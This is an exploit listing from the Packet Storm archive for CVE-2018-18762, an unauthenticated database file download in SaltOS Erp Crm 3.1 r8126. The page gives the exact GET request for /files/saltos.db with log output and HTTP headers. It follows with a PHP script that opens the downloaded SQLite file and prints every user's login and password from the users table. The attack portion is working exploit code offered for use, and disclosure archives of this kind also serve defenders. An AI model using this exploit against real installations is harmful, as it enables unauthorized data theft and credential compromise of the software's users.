exploit the possibilities

SaltOS Erp Crm 3.1 r8126 Database Download

SaltOS Erp Crm 3.1 r8126 Database Download
Posted Oct 29, 2018
Authored by Ihsan Sencan

Erp Crm version 3.1 r8126 suffers from a database download vulnerability.

tags | exploit
advisories | CVE-2018-18762
MD5 | f84a9d4a26dd9ac0abbf5f30458515b9

SaltOS Erp Crm 3.1 r8126 Database Download

Change Mirror Download
# Exploit Title: SaltOS Erp, Crm 3.1 r8126 - Database File Download
# Dork: N/A
# Date: 2018-10-29
# Exploit Author: Ihsan Sencan
# Vendor Homepage: http://www.saltos.org/
# Software Link: http://download.saltos.org/?app=saltos&format=xul&arch=win32
# Version: 3.1 r0 / 3.x
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: CVE-2018-18762

# POC:
# 1)
# http://localhost/[PATH]/files/saltos.db
#
# [Mon Oct 29 00:05:49 2018] 127.0.0.1:2853 [200]: /index.php?action=logout
# [Mon Oct 29 00:05:49 2018] 127.0.0.1:2856 [200]: /
# [Mon Oct 29 00:05:51 2018] 127.0.0.1:2857 [200]: /files/saltos.db
#
GET /files/saltos.db HTTP/1.1
Host: localhost:57187
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:50.0) Gecko/20100101 Firefox/50.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=a06furpg1gf54hqf573l886qs3; lang=es_ES; __lang__=1543317075; style=blue; __style__=1543317075; iconset=silk; __iconset__=1543317075
DNT: 1
Connection: keep-alive
Upgrade-Insecure-Requests: 1
HTTP/1.1 200 OK
Host: localhost:57187
Connection: close
Content-Type: application/octet-stream
Content-Length: 8462336

<?php

$baglan = new SQLite3('saltos.db');

$sonuc = $baglan->query('SELECT * FROM tbl_usuarios');

while ($p = $sonuc->fetchArray()) {?>

<h4><?php echo $p['login'];?></h4>
<h4><?php echo $p['password'];?></h4>

<?php } ?>


Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

April 2020

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    60 Files
  • 2
    Apr 2nd
    20 Files
  • 3
    Apr 3rd
    15 Files
  • 4
    Apr 4th
    5 Files
  • 5
    Apr 5th
    5 Files
  • 6
    Apr 6th
    27 Files
  • 7
    Apr 7th
    31 Files
  • 8
    Apr 8th
    0 Files
  • 9
    Apr 9th
    0 Files
  • 10
    Apr 10th
    0 Files
  • 11
    Apr 11th
    0 Files
  • 12
    Apr 12th
    0 Files
  • 13
    Apr 13th
    0 Files
  • 14
    Apr 14th
    0 Files
  • 15
    Apr 15th
    0 Files
  • 16
    Apr 16th
    0 Files
  • 17
    Apr 17th
    0 Files
  • 18
    Apr 18th
    0 Files
  • 19
    Apr 19th
    0 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    0 Files
  • 23
    Apr 23rd
    0 Files
  • 24
    Apr 24th
    0 Files
  • 25
    Apr 25th
    0 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2016 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close